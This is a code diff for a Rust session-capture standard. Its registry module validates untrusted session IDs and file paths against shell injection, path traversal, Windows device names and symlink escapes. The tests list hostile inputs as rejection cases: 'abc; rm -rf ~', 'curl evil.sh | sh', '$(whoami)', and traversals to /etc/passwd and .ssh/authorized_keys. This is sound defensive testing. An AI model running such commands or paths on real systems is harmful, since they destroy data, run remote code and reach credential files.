+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            RegistryError::UnknownSourceFormat(sf) => write!(
+                f,
+                "no reconstitution registry entry for source_format `{sf}`; \
+                 this harness cannot be reconstituted"
+            ),
+            RegistryError::InvalidSessionId => {
+                write!(
+                    f,
+                    "session_id does not match the registry entry's expected shape"
+                )
+            }
+            RegistryError::UnsafeSourcePath => write!(
+                f,
+                "metadata.source_path is absolute or escapes the harness session root"
+            ),
+        }
+    }
+}
+
+impl std::error::Error for RegistryError {}
+
+impl Registry {
+    /// Load the registry shipped with this standard.
+    ///
+    /// # Panics
+    ///
+    /// Panics if the embedded registry is malformed, which would mean the
+    /// shipped package is corrupt. A test in `tests/` covers this.
+    pub fn shipped() -> Self {
+        toml::from_str(REGISTRY_TOML).expect("embedded reconstitution registry must parse")
+    }
+
+    /// Look up the entry for a `source_format`.
+    pub fn entry(&self, source_format: &str) -> Result<&Entry, RegistryError> {
+        self.entries
+            .get(source_format)
+            .ok_or_else(|| RegistryError::UnknownSourceFormat(source_format.to_string()))
+    }
+}
+
+impl SlugRule {
+    /// Derive the harness's directory slug from an absolute working directory.
+    ///
+    /// Returns `None` when the harness does not partition by working directory.
+    pub fn slug_for(&self, cwd: &str) -> Option<String> {
+        if self.source != "cwd_absolute" {
+            return None;
+        }
+        let mut slug = cwd.to_string();
+        for (from, to) in &self.replace {
+            slug = slug.replace(from.as_str(), to.as_str());
+        }
+        Some(slug)
+    }
+}
+
+impl Entry {
+    /// Validate an untrusted `session_id` against this entry's
+    /// `session_id_pattern` (section 6.4.5).
+    ///
+    /// The pattern is compiled and matched for real. An earlier version chose
+    /// between two hard-coded shapes by inspecting the pattern text, which meant
+    /// a future registry entry with a different pattern would silently fall
+    /// through to the wrong check.
+    ///
+    /// A pattern that fails to compile rejects everything. That is deliberate:
+    /// the failure mode of a bad pattern must be a refused restore, never an
+    /// accepted hostile identifier.
+    pub fn validate_session_id(&self, session_id: &str) -> Result<(), RegistryError> {
+        // Defence in depth. Even a permissive or malformed registry pattern
+        // cannot admit a value carrying shell metacharacters, whitespace, or
+        // path separators, because this value is interpolated into a resume
+        // argument vector and a path template.
+        if !is_safe_identifier(session_id) {
+            return Err(RegistryError::InvalidSessionId);
+        }
+        let anchored = anchor(&self.session_id_pattern);
+        let re = regex::Regex::new(&anchored).map_err(|_| RegistryError::InvalidSessionId)?;
+        if re.is_match(session_id) {
+            Ok(())
+        } else {
+            Err(RegistryError::InvalidSessionId)
+        }
+    }
+}
+
+/// Force a pattern to match the whole string.
+///
+/// An unanchored pattern would match a substring, so `abc; rm -rf ~` could
+/// satisfy a pattern intended to describe only `abc`.
+///
+/// The wrapping is UNCONDITIONAL. An earlier version skipped it when the pattern
+/// already began with `^` or ended with `$`, which alternation defeats: given
+/// `^foo|bar$`, the pattern parses as `(^foo)|(bar$)`, so `fooATTACK` matches the
+/// first branch. Wrapping in a non-capturing group with absolute anchors makes
+/// that impossible regardless of what the pattern contains.
+///
+/// `\A` and `\z` are used rather than `^` and `$` so that a pattern enabling
+/// multi-line mode cannot reinterpret the anchors as line boundaries.
+fn anchor(pattern: &str) -> String {
+    format!(r"\A(?:{pattern})\z")
+}
+
+/// Whether a string is a conservative identifier: alphanumeric start, then
+/// alphanumerics, hyphens, or underscores, bounded in length.
+///
+/// ASCII-only by design. A Unicode-permissive check would admit homoglyphs and
+/// normalization surprises into a value that reaches a command line.
+fn is_safe_identifier(s: &str) -> bool {
+    !s.is_empty()
+        && s.len() <= 128
+        && s.chars().next().is_some_and(|c| c.is_ascii_alphanumeric())
+        && s.chars()
+            .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
+}
+
+/// Windows reserved device names. Writing to any of these, with or without an
+/// extension, targets a device rather than a file under the root.
+///
+/// Includes the superscript `COM¹`/`LPT²` forms, which Windows also resolves to
+/// devices and which an ASCII-only list would miss.
+const WINDOWS_RESERVED: [&str; 28] = [
+    "CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8",
+    "COM9", "COM¹", "COM²", "COM³", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8",
+    "LPT9", "LPT¹", "LPT²", "LPT³",
+];
+
+/// Characters Windows forbids in a filename. `:` matters most: it introduces an
+/// NTFS alternate data stream, so `ordinary.jsonl:hidden` writes a hidden stream
+/// rather than the file it appears to name.
+const WINDOWS_FORBIDDEN_CHARS: [char; 7] = [':', '"', '<', '>', '|', '*', '?'];
+
+fn is_windows_reserved(segment: &str) -> bool {
+    // Windows strips trailing dots and spaces, so `NUL ` and `NUL.` both resolve
+    // to the NUL device. Strip them before comparing.
+    let trimmed = segment.trim_end_matches([' ', '.']);
+    let stem = trimmed.split('.').next().unwrap_or(trimmed);
+    let stem = stem.trim_end_matches([' ', '.']);
+    WINDOWS_RESERVED
+        .iter()
+        .any(|reserved| stem.eq_ignore_ascii_case(reserved))
+}
+
+/// Whether a path segment is unsafe on a Windows host.
+///
+/// Applied on every platform. A corpus is shared across machines, so an envelope
+/// captured on macOS may be reconstituted on Windows; rejecting uniformly keeps
+/// conformance from depending on which host happens to restore.
+fn is_unsafe_windows_segment(segment: &str) -> bool {
+    is_windows_reserved(segment)
+        || segment.contains(WINDOWS_FORBIDDEN_CHARS)
+        // A segment ending in a space or dot is silently renamed by Windows,
+        // so the path written is not the path validated.
+        || segment.ends_with(' ')
+        || segment.ends_with('.')
+}
+
+/// Whether an untrusted `metadata.source_path` passes the LEXICAL half of the
+/// containment check (section 6.4.5).
+///
+/// Rejects empty strings, embedded NUL, absolute POSIX paths, UNC and Windows
+/// drive-qualified paths, Windows reserved device names, and any path that
+/// escapes the root once `.` and `..` segments are resolved.
+///
+/// # This check alone is NOT sufficient
+///
+/// It is purely lexical. It cannot see symlinks: `link/authorized_keys` passes
+/// here, and if `link` is a symlink or directory junction pointing outside the
+/// root, writing the result escapes the root. A caller MUST additionally resolve
+/// the path against the real filesystem and confirm containment. Use
+/// [`resolve_within_root`], which does both.
+///
+/// Validation must also be the LAST string transformation before use. Percent
+/// decoding or Unicode normalization applied after this check can reintroduce
+/// separators it rejected.
+pub fn is_safe_source_path(source_path: &str) -> bool {
+    if source_path.is_empty() || source_path.contains('\0') {
+        return false;
+    }
+    // Absolute (POSIX), UNC, or Windows drive-qualified paths are never relative
+    // to the harness root.
+    if source_path.starts_with('/') || source_path.starts_with('\\') {
+        return false;
+    }
+    let bytes = source_path.as_bytes();
+    if bytes.len() >= 2 && bytes[1] == b':' && bytes[0].is_ascii_alphabetic() {
+        return false;
+    }
+    // Walk segments, treating both separators as separators so a Windows-style
+    // traversal cannot slip past a POSIX-only split.
+    let mut depth: i32 = 0;
+    for segment in source_path.split(['/', '\\']) {
+        match segment {
+            "" | "." => continue,
+            ".." => {
+                depth -= 1;
+                if depth < 0 {
+                    return false;
+                }
+            }
+            other => {
+                if is_unsafe_windows_segment(other) {
+                    return false;
+                }
+                depth += 1;
+            }
+        }
+    }
+    depth > 0
+}
+
+/// Resolve an untrusted `source_path` to an absolute path proven to sit inside
+/// `root`, doing both halves of the containment check (section 6.4.5).
+///
+/// Performs the lexical check ([`is_safe_source_path`]), then resolves the
+/// deepest existing ancestor of the target through the real filesystem
+/// (following symlinks) and confirms the result is still under the canonicalized
+/// root. This is what catches a `source_path` whose intermediate component is a
+/// symlink out of the root, which the lexical check cannot see.
+///
+/// `root` must exist. The target itself need not: reconstitution creates it.
+///
+/// # Time-of-check to time-of-use
+///
+/// The returned path was contained *at the moment it was checked*. An attacker
+/// who can create symlinks inside the root can swap a component between this
+/// call and the subsequent write. On a single-user machine writing into the
+/// user's own harness directory that is not a meaningful threat. Where it is,
+/// a caller must additionally open with no-follow semantics relative to a
+/// directory descriptor, which this crate does not attempt portably.
+pub fn resolve_within_root(
+    root: &std::path::Path,
+    source_path: &str,
+) -> Result<std::path::PathBuf, RegistryError> {
+    if !is_safe_source_path(source_path) {
+        return Err(RegistryError::UnsafeSourcePath);
+    }
+    let canonical_root = root
+        .canonicalize()
+        .map_err(|_| RegistryError::UnsafeSourcePath)?;
+    // A non-directory root would make every child path meaningless.
+    if !canonical_root.is_dir() {
+        return Err(RegistryError::UnsafeSourcePath);
+    }
+
+    // Normalize separators so a Windows-style path resolves on any host.
+    let mut candidate = canonical_root.clone();
+    for segment in source_path.split(['/', '\\']) {
+        match segment {
+            "" | "." => continue,
+            ".." => {
+                if !candidate.pop() || !candidate.starts_with(&canonical_root) {
+                    return Err(RegistryError::UnsafeSourcePath);
+                }
+            }
+            other => candidate.push(other),
+        }
+    }
+
+    // Resolve the deepest ancestor that exists, so symlinked intermediate
+    // components are followed and checked. The leaf itself may not exist yet.
+    //
+    // `symlink_metadata` rather than `exists`: `exists()` follows symlinks and
+    // reports false for a DANGLING one, which would let `root/link/session.jsonl`
+    // (where `link` points outside the root at a target that does not exist yet)
+    // be treated as two nonexistent trailing components and pushed back onto the
+    // canonical root unchecked. Creating the target afterwards would then place
+    // the write outside the root.
+    let mut existing = candidate.as_path();
+    let mut trailing = Vec::new();
+    while existing.symlink_metadata().is_err() {
+        let Some(name) = existing.file_name() else {
+            return Err(RegistryError::UnsafeSourcePath);
+        };
+        trailing.push(name.to_owned());
+        let Some(parent) = existing.parent() else {
+            return Err(RegistryError::UnsafeSourcePath);
+        };
+        existing = parent;
+    }
+    // The deepest existing component must not itself be a symlink: canonicalize
+    // would follow it, and a dangling one cannot be canonicalized at all.
+    let metadata = existing
+        .symlink_metadata()
+        .map_err(|_| RegistryError::UnsafeSourcePath)?;
+    if metadata.file_type().is_symlink() {
+        return Err(RegistryError::UnsafeSourcePath);
+    }
+    let mut resolved = existing
+        .canonicalize()
+        .map_err(|_| RegistryError::UnsafeSourcePath)?;
+    if !resolved.starts_with(&canonical_root) {
+        return Err(RegistryError::UnsafeSourcePath);
+    }
+    for name in trailing.into_iter().rev() {
+        resolved.push(name);
+    }
+    if !resolved.starts_with(&canonical_root) {
+        return Err(RegistryError::UnsafeSourcePath);
+    }
+    Ok(resolved)
+}
+
+/// Validate an untrusted `source_path`, returning it when safe.
+pub fn checked_source_path(source_path: &str) -> Result<&str, RegistryError> {
+    if is_safe_source_path(source_path) {
+        Ok(source_path)
+    } else {
+        Err(RegistryError::UnsafeSourcePath)
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn shipped_registry_parses_and_declares_a_version() {
+        let reg = Registry::shipped();
+        assert!(!reg.registry_version.is_empty());
+        assert!(reg.entries.contains_key("claude-jsonl-v1"));
+        assert!(reg.entries.contains_key("codex-turns-v1"));
+    }
+
+    #[test]
+    fn unknown_source_format_is_an_error_not_a_guess() {
+        let reg = Registry::shipped();
+        // Cursor is captured but deliberately not reconstitutable (SQLite, not
+        // per-session files). The registry says so by omission.
+        let err = reg.entry("cursor-bubbles-v1").unwrap_err();
+        assert_eq!(
+            err,
+            RegistryError::UnknownSourceFormat("cursor-bubbles-v1".to_string())
+        );
+    }
+
+    #[test]
+    fn claude_slug_rule_matches_observed_layout() {
+        let reg = Registry::shipped();
+        let entry = reg.entry("claude-jsonl-v1").unwrap();
+        // Verified against a live ~/.claude/projects tree: separators and dots
+        // both collapse to hyphens, so a dotted directory such as `.claude`
+        // renders as `--claude`.
+        assert_eq!(
+            entry.slug_rule.slug_for("/Users/me/Code/proj").as_deref(),
+            Some("-Users-me-Code-proj")
+        );
+        assert_eq!(
+            entry
+                .slug_rule
+                .slug_for("/Users/me/Code/proj/.claude/worktrees/x")
+                .as_deref(),
+            Some("-Users-me-Code-proj--claude-worktrees-x")
+        );
+    }
+
+    #[test]
+    fn codex_has_no_cwd_slug() {
+        let reg = Registry::shipped();
+        let entry = reg.entry("codex-turns-v1").unwrap();
+        assert_eq!(entry.slug_rule.slug_for("/Users/me/Code/proj"), None);
+    }
+
+    #[test]
+    fn resume_is_structured_never_a_shell_string() {
+        let reg = Registry::shipped();
+        for (source_format, entry) in &reg.entries {
+            assert!(
+                !entry.resume.program.contains(' '),
+                "{source_format}: resume.program must be a bare program, not a command line"
+            );
+            assert!(
+                !entry.resume.program.is_empty(),
+                "{source_format}: resume.program must be set"
+            );
+        }
+    }
+
+    #[test]
+    fn codex_session_ids_must_be_uuids() {
+        let reg = Registry::shipped();
+        let entry = reg.entry("codex-turns-v1").unwrap();
+        assert!(
+            entry
+                .validate_session_id("019e9515-c90c-74b1-9dd9-d5961364264a")
+                .is_ok()
+        );
+        assert_eq!(
+            entry.validate_session_id("not-a-uuid").unwrap_err(),
+            RegistryError::InvalidSessionId
+        );
+    }
+
+    #[test]
+    fn session_id_injection_attempts_are_rejected() {
+        let reg = Registry::shipped();
+        let entry = reg.entry("claude-jsonl-v1").unwrap();
+        assert!(
+            entry
+                .validate_session_id("0915b842-975d-4fce-bdb5-35ed5200e805")
+                .is_ok()
+        );
+        for hostile in [
+            "abc; rm -rf ~",
+            "abc && curl evil.sh | sh",
+            "../../etc/passwd",
+            "$(whoami)",
+            "`id`",
+            "a b",
+            "",
+        ] {
+            assert_eq!(
+                entry.validate_session_id(hostile).unwrap_err(),
+                RegistryError::InvalidSessionId,
+                "must reject hostile session_id: {hostile:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn safe_source_paths_are_accepted() {
+        for ok in [
+            "2026/06/04/rollout-2026-06-04T17-01-33-abc.jsonl",
+            "-Users-me-Code-proj/0915b842.jsonl",
+            "./nested/file.jsonl",
+        ] {
+            assert!(is_safe_source_path(ok), "should accept: {ok}");
+        }
+    }
+
+    #[test]
+    fn traversal_and_absolute_source_paths_are_rejected() {
+        for bad in [
+            "../../../.ssh/authorized_keys",
+            "/etc/passwd",
+            "\\\\server\\share\\x",
+            "C:\\Windows\\system32\\x",
+            "a/../../..",
+            "..",
+            "",
+            "with\0nul",
+            ".",
+        ] {
+            assert!(!is_safe_source_path(bad), "should reject: {bad:?}");
+        }
+    }
+
+    #[test]
+    fn traversal_that_stays_inside_the_root_is_allowed() {
+        // Descending then ascending nets out inside the root, which is fine.
+        assert!(is_safe_source_path("a/b/../c.jsonl"));
+        // Ascending past the root is not, even when a later segment descends.
+        assert!(!is_safe_source_path("a/../../b.jsonl"));
+    }
+
+    #[test]
+    fn windows_reserved_device_names_are_rejected() {
+        // Writing to these targets a device, not a child of the root.
+        for reserved in [
+            "NUL",
+            "nul",
+            "CON.txt",
+            "aux",
+            "COM1",
+            "lpt9.jsonl",
+            "a/NUL",
+        ] {
+            assert!(
+                !is_safe_source_path(reserved),
+                "should reject Windows reserved name: {reserved}"
+            );
+        }
+        // Names that merely start with a reserved prefix are fine.
+        for ok in ["NULL.jsonl", "console/x.jsonl", "comic.jsonl"] {
+            assert!(is_safe_source_path(ok), "should accept: {ok}");
+        }
+    }
+
+    /// Windows silently strips trailing dots and spaces, and treats `:` as an
+    /// alternate-data-stream separator, so each of these writes somewhere other
+    /// than the name suggests.
+    #[test]
+    fn windows_normalization_and_stream_bypasses_are_rejected() {
+        for bypass in [
+            "NUL ",                  // trailing space normalizes to NUL
+            "NUL.",                  // trailing dot normalizes to NUL
+            "COM1 ",                 // same, numbered device
+            "COM\u{00B9}",           // superscript device name
+            "LPT\u{00B2}",           // superscript device name
+            "NUL:stream",            // ADS on a device
+            "ordinary.jsonl:hidden", // ADS on an ordinary file
+            "trailing ",             // renamed by Windows, so not the validated path
+            "trailing.",             // same
+            "a<b.jsonl",
+            "a|b.jsonl",
+            "a?b.jsonl",
+            "a*b.jsonl",
+            "a\"b.jsonl",
+        ] {
+            assert!(
+                !is_safe_source_path(bypass),
+                "should reject Windows-unsafe segment: {bypass:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn session_id_is_matched_against_the_registry_pattern_not_a_guess() {
+        // A pattern the old heuristic would have mis-handled: it contains no
+        // "{12}", so the previous implementation fell through to the identifier
+        // whitelist and accepted "abc".
+        let entry = Entry {
+            harness: "Test".into(),
+            description: "digits only".into(),
+            path_template: "{session_id}".into(),
+            serialization: "jsonl".into(),
+            session_id_pattern: "^[0-9]+$".into(),
+            prefer_source_path: false,
+            slug_rule: SlugRule {
+                source: "none".into(),
+                replace: Vec::new(),
+            },
+            resume: Resume {
+                program: "true".into(),
+                args: Vec::new(),
+                cwd: ".".into(),
+            },
+        };
+        assert!(entry.validate_session_id("12345").is_ok());
+        assert_eq!(
+            entry.validate_session_id("abc").unwrap_err(),
+            RegistryError::InvalidSessionId,
+            "a non-matching id must be rejected by the pattern, not waved through"
+        );
+    }
+
+    #[test]
+    fn an_unanchored_pattern_still_matches_the_whole_id() {
+        let entry = Entry {
+            harness: "Test".into(),
+            description: "unanchored".into(),
+            path_template: "{session_id}".into(),
+            serialization: "jsonl".into(),
+            // Deliberately unanchored: must not match a prefix of a longer id.
+            session_id_pattern: "[0-9]+".into(),
+            prefer_source_path: false,
+            slug_rule: SlugRule {
+                source: "none".into(),
+                replace: Vec::new(),
+            },
+            resume: Resume {
+                program: "true".into(),
+                args: Vec::new(),
+                cwd: ".".into(),
+            },
+        };
+        assert!(entry.validate_session_id("123").is_ok());
+        assert_eq!(
+            entry.validate_session_id("123abc").unwrap_err(),
+            RegistryError::InvalidSessionId
+        );
+    }
+
+    #[test]
+    fn an_uncompilable_pattern_rejects_everything() {
+        let entry = Entry {
+            harness: "Test".into(),
+            description: "broken".into(),
+            path_template: "{session_id}".into(),
+            serialization: "jsonl".into(),
+            session_id_pattern: "^[unclosed".into(),
+            prefer_source_path: false,
+            slug_rule: SlugRule {
+                source: "none".into(),
+                replace: Vec::new(),
+            },
+            resume: Resume {
+                program: "true".into(),
+                args: Vec::new(),
+                cwd: ".".into(),
+            },
+        };
+        // Fail closed: a broken registry entry must refuse restores, never
+        // accept an unvalidated identifier.
+        assert_eq!(
+            entry.validate_session_id("anything").unwrap_err(),
+            RegistryError::InvalidSessionId
+        );
+    }
+
+    #[test]
+    fn resolve_within_root_catches_a_symlink_escape_the_lexical_check_cannot() {
+        let base = std::env::temp_dir().join("apss-scs-symlink-test");
+        let _ = std::fs::remove_dir_all(&base);
+        let root = base.join("root");
+        let outside = base.join("outside");
+        std::fs::create_dir_all(&root).unwrap();
+        std::fs::create_dir_all(&outside).unwrap();
+
+        #[cfg(unix)]
+        std::os::unix::fs::symlink(&outside, root.join("link")).unwrap();
+        #[cfg(not(unix))]
+        {
+            let _ = &outside;
+            return;
+        }
+
+        // The lexical check cannot see through the symlink and accepts it.
+        assert!(is_safe_source_path("link/authorized_keys"));
+        // The filesystem-aware check rejects it.
+        assert_eq!(
+            resolve_within_root(&root, "link/authorized_keys").unwrap_err(),
+            RegistryError::UnsafeSourcePath,
+            "a symlinked component escaping the root must be rejected"
+        );
+        // A genuine in-root path still resolves.
+        let ok = resolve_within_root(&root, "projects/session.jsonl").unwrap();
+        assert!(ok.starts_with(root.canonicalize().unwrap()));
+
+        let _ = std::fs::remove_dir_all(&base);
+    }
+
+    /// A dangling symlink is the case `Path::exists()` gets wrong: it follows
+    /// links, so it reports false for a link whose target does not exist yet.
+    /// Treating that as a nonexistent trailing component would push it back onto
+    /// the canonical root unchecked, and creating the target later would place
+    /// the write outside the root.
+    #[test]
+    #[cfg(unix)]
+    fn resolve_within_root_rejects_a_dangling_symlink_component() {
+        let base = std::env::temp_dir().join("apss-scs-dangling-test");
+        let _ = std::fs::remove_dir_all(&base);
+        let root = base.join("root");
+        std::fs::create_dir_all(&root).unwrap();
+
+        // Points outside the root at a target that does not exist yet.
+        std::os::unix::fs::symlink(base.join("outside-not-created"), root.join("link")).unwrap();
+
+        assert!(
+            is_safe_source_path("link/session.jsonl"),
+            "the lexical check cannot see the symlink, which is the point"
+        );
+        assert_eq!(
+            resolve_within_root(&root, "link/session.jsonl").unwrap_err(),
+            RegistryError::UnsafeSourcePath,
+            "a dangling symlink component must be rejected, not deferred"
+        );
+
+        let _ = std::fs::remove_dir_all(&base);
+    }
+
+    #[test]
+    fn resolve_within_root_requires_a_directory_root() {
+        let base = std::env::temp_dir().join("apss-scs-fileroot-test");
+        let _ = std::fs::remove_dir_all(&base);
+        std::fs::create_dir_all(&base).unwrap();
+        let file_root = base.join("not-a-dir");
+        std::fs::write(&file_root, b"x").unwrap();
+
+        assert_eq!(
+            resolve_within_root(&file_root, "child.jsonl").unwrap_err(),
+            RegistryError::UnsafeSourcePath
+        );
+        assert_eq!(
+            resolve_within_root(&base.join("does-not-exist"), "child.jsonl").unwrap_err(),
+            RegistryError::UnsafeSourcePath,
+            "a nonexistent root must fail closed"
+        );
+
+        let _ = std::fs::remove_dir_all(&base);
+    }
+
+    /// Alternation defeats naive anchoring: `^foo|bar$` parses as
+    /// `(^foo)|(bar$)`, so a prefix match satisfies it.
+    #[test]
+    fn alternation_cannot_defeat_anchoring() {
+        for pattern in ["^foo|bar$", "foo|bar$", "^foo|bar", "foo|bar"] {
+            let entry = Entry {
+                harness: "Test".into(),
+                description: "alternation".into(),
+                path_template: "{session_id}".into(),
+                serialization: "jsonl".into(),
+                session_id_pattern: pattern.into(),
+                prefer_source_path: false,
+                slug_rule: SlugRule {
+                    source: "none".into(),
+                    replace: Vec::new(),
+                },
+                resume: Resume {
+                    program: "true".into(),
+                    args: Vec::new(),
+                    cwd: ".".into(),
+                },
+            };
+            assert!(
+                entry.validate_session_id("foo").is_ok(),
+                "{pattern}: the whole-string match must still succeed"
+            );
+            assert_eq!(
+                entry.validate_session_id("fooATTACK").unwrap_err(),
+                RegistryError::InvalidSessionId,
+                "{pattern}: a prefix match must not satisfy an anchored pattern"
+            );
+        }
+    }
+
+    #[test]
+    fn checked_source_path_surfaces_the_error() {
+        assert_eq!(
+            checked_source_path("../../etc/passwd").unwrap_err(),
+            RegistryError::UnsafeSourcePath
+        );
+        assert_eq!(checked_source_path("a/b.jsonl").unwrap(), "a/b.jsonl");
+    }
+}

--- a/standards/v1/APS-V1-0004-session-capture/standard.toml
+++ b/standards/v1/APS-V1-0004-session-capture/standard.toml
@@ -1,0 +1,50 @@
+schema = "aps.standard/v1"
+
+[standard]
+id = "APS-V1-0004"
+name = "Session Capture Standard"
+slug = "session-capture"
+version = "1.0.0"
+category = "technical"
+status = "active"
+
+[aps]
+aps_major = "v1"
+backwards_compatible_major_required = true
+
+[ownership]
+maintainers = ["AgentParadise"]
+
+# Promotion metadata
+[promotion]
+promoted_from = "EXP-V1-0003"
+promoted_at = "2026-08-06"
+
+[dependencies]
+[[dependencies.allowed_external]]
+crate = "serde"
+rationale = "Workspace dependency for deserialising the session envelope schema types shared by all three conformance profiles"
+
+[[dependencies.allowed_external]]
+crate = "serde_json"
+rationale = "Workspace dependency for JSON encoding of envelopes and the opaque raw payload"
+
+[[dependencies.allowed_external]]
+crate = "toml"
+rationale = "Parses the shipped reconstitution registry (registry/reconstitution.toml) that maps source_format to harness path templates and resume descriptors"
+
+[[dependencies.allowed_external]]
+crate = "regex"
+rationale = "Validates an untrusted session_id against the reconstitution registry entry's session_id_pattern before it is interpolated into a resume command (spec 6.4.5)"
+
+[[dependencies.allowed_external]]
+crate = "sha2"
+rationale = "Computes the SHA-256 content_hash the standard mandates (spec 4.2.3); shipping the implementation is what makes the hash interoperable rather than merely described"
+
+[[dependencies.allowed_external]]
+crate = "serde_json_canonicalizer"
+rationale = "RFC 8785 (JCS) serialization of the content_hash input, so independent stores produce byte-identical digests for identical content (spec 4.2.3)"
+
+[[dependencies.allowed_external]]
+crate = "jsonschema"
+rationale = "Dev-only dependency: conformance tests validate the shipped examples against the embedded session-envelope JSON Schema"

--- a/standards/v1/APS-V1-0004-session-capture/tests/envelope_examples_test.rs
+++ b/standards/v1/APS-V1-0004-session-capture/tests/envelope_examples_test.rs
@@ -1,0 +1,129 @@
+//! Integration tests: the shipped example envelopes parse and validate against
+//! the definitional crate, and the example batch is well-formed.
+//!
+//! Both examples model envelopes IN FLIGHT (spec 4.2.3), so neither carries a
+//! `content_hash`. That is the state a producer actually emits, and the examples
+//! exist to show producers what to build.
+
+use session_capture::reconstitution::Registry;
+use session_capture::{SessionEnvelope, ValidationError};
+
+const SOURCE_EXAMPLE: &str = include_str!("../examples/claude-source-envelope.json");
+const BATCH_EXAMPLE: &str = include_str!("../examples/workflow-exporter-batch.json");
+
+fn batch_envelopes() -> Vec<SessionEnvelope> {
+    let body: serde_json::Value =
+        serde_json::from_str(BATCH_EXAMPLE).expect("batch example must be valid JSON");
+    body["envelopes"]
+        .as_array()
+        .expect("batch body must carry an `envelopes` array")
+        .iter()
+        .map(|v| serde_json::from_value(v.clone()).expect("each envelope must parse"))
+        .collect()
+}
+
+fn all_examples() -> Vec<SessionEnvelope> {
+    let mut all = vec![serde_json::from_str(SOURCE_EXAMPLE).expect("source example must parse")];
+    all.extend(batch_envelopes());
+    all
+}
+
+#[test]
+fn source_example_parses_and_validates() {
+    let env: SessionEnvelope =
+        serde_json::from_str(SOURCE_EXAMPLE).expect("source example must be a valid envelope");
+    env.validate().expect("source example must pass validation");
+    assert_eq!(env.agent, "ClaudeCode");
+    assert_eq!(env.origin.environment, "local");
+}
+
+#[test]
+fn batch_example_envelopes_all_validate_and_share_workflow_id() {
+    let envelopes = batch_envelopes();
+    assert!(
+        envelopes.len() >= 2,
+        "multi-agent run has one envelope per agent"
+    );
+
+    let mut workflow_ids = std::collections::BTreeSet::new();
+    for env in envelopes {
+        env.validate().expect("each envelope must validate");
+        assert_eq!(env.origin.environment, "workflow");
+        let md = env.metadata.expect("workflow envelopes carry metadata");
+        workflow_ids.insert(md.workflow_id.expect("workflow_id groups the run"));
+    }
+    // Every per-agent envelope in one run shares a single workflow_id.
+    assert_eq!(workflow_ids.len(), 1, "one run == one shared workflow_id");
+}
+
+/// Producers do not compute `content_hash` (spec 4.2.3), so no shipped example
+/// may carry one. An example that did would teach producers to send a value the
+/// store is required to discard.
+#[test]
+fn no_example_carries_a_producer_supplied_content_hash() {
+    for env in all_examples() {
+        assert!(
+            env.content_hash.is_none(),
+            "in-flight example must not carry content_hash (session {})",
+            env.session_id
+        );
+        assert_eq!(
+            env.idempotency_key(),
+            None,
+            "an in-flight envelope has no dedup key yet"
+        );
+        assert_eq!(
+            env.validate_stored(),
+            Err(ValidationError::MissingStoredContentHash),
+            "in-flight examples are not stored envelopes"
+        );
+    }
+}
+
+/// Every example claims a `source_format` that appears in the reconstitution
+/// registry, so each MUST carry a string `raw` (spec 4.3.1) and a `session_id`
+/// the registry accepts. This is what stops the examples drifting into a shape
+/// the standard forbids.
+#[test]
+fn examples_are_reconstitutable_as_the_registry_requires() {
+    let registry = Registry::shipped();
+    for env in all_examples() {
+        let entry = registry
+            .entry(&env.source_format)
+            .unwrap_or_else(|e| panic!("example uses an unregistered source_format: {e}"));
+        assert!(
+            env.raw.is_string(),
+            "{}: a registered source_format requires a verbatim string raw, got {}",
+            env.source_format,
+            if env.raw.is_object() {
+                "object"
+            } else {
+                "array"
+            }
+        );
+        entry
+            .validate_session_id(&env.session_id)
+            .unwrap_or_else(|e| {
+                panic!(
+                    "{}: example session_id `{}` is rejected by the registry: {e}",
+                    env.source_format, env.session_id
+                )
+            });
+    }
+}
+
+/// `metadata.source_path` is the field a Reconstitutor prefers, so the examples
+/// must model a value that passes the untrusted-input check.
+#[test]
+fn example_source_paths_are_safe() {
+    for env in all_examples() {
+        let md = env.metadata.expect("examples carry metadata");
+        let source_path = md
+            .source_path
+            .expect("examples model source_path so producers copy it");
+        assert!(
+            session_capture::reconstitution::is_safe_source_path(&source_path),
+            "example source_path must pass the containment check: {source_path}"
+        );
+    }
+}

--- a/standards/v1/APS-V1-0004-session-capture/tests/local_roundtrip_test.rs
+++ b/standards/v1/APS-V1-0004-session-capture/tests/local_roundtrip_test.rs
@@ -1,0 +1,360 @@
+//! Local conformance harness: the producer round trip (spec section 6.4.4) run
+//! against REAL harness session files on the machine executing the test.
+//!
+//! These tests are `#[ignore]`d because they depend on a populated `~/.claude`
+//! or `~/.codex`, which CI does not have. Run them deliberately:
+//!
+//! ```bash
+//! cargo test -p apss-v1-0004-session-capture -- --ignored --nocapture
+//! ```
+//!
+//! What they prove, end to end and without a running store:
+//!
+//! 1. A real transcript can be wrapped into a schema-valid envelope.
+//! 2. The reconstitution registry resolves a target path for it.
+//! 3. Writing `raw` back reproduces the original file BYTE FOR BYTE.
+//!
+//! Step 3 is the executable form of "raw is preserved verbatim" (section 4.3),
+//! which is otherwise only a prose MUST.
+
+use session_capture::reconstitution::{Registry, resolve_within_root};
+use session_capture::{SCS_VERSION, SessionEnvelope, session_envelope_schema};
+use std::path::{Path, PathBuf};
+
+fn home() -> PathBuf {
+    PathBuf::from(std::env::var("HOME").expect("HOME must be set"))
+}
+
+/// Find one real session file under `root` matching `extension`, deepest-first
+/// so date-partitioned layouts are handled.
+fn find_one_session(root: &Path, extension: &str) -> Option<PathBuf> {
+    fn walk(dir: &Path, extension: &str, out: &mut Vec<PathBuf>, depth: usize) {
+        if depth > 6 || out.len() > 200 {
+            return;
+        }
+        let Ok(entries) = std::fs::read_dir(dir) else {
+            return;
+        };
+        for entry in entries.flatten() {
+            let path = entry.path();
+            if path.is_dir() {
+                walk(&path, extension, out, depth + 1);
+            } else if path.extension().and_then(|e| e.to_str()) == Some(extension) {
+                out.push(path);
+            }
+        }
+    }
+    let mut found = Vec::new();
+    walk(root, extension, &mut found, 0);
+
+    // Only consider real session transcripts: files whose name yields a valid
+    // session id. This excludes incidental JSONL in the tree (subagent journals,
+    // tool logs), which would make the round trip pass without exercising an
+    // actually resumable session.
+    found.retain(|p| {
+        p.file_stem()
+            .and_then(|s| s.to_str())
+            .map(|stem| is_uuid_like(&extract_session_id(stem)))
+            .unwrap_or(false)
+    });
+
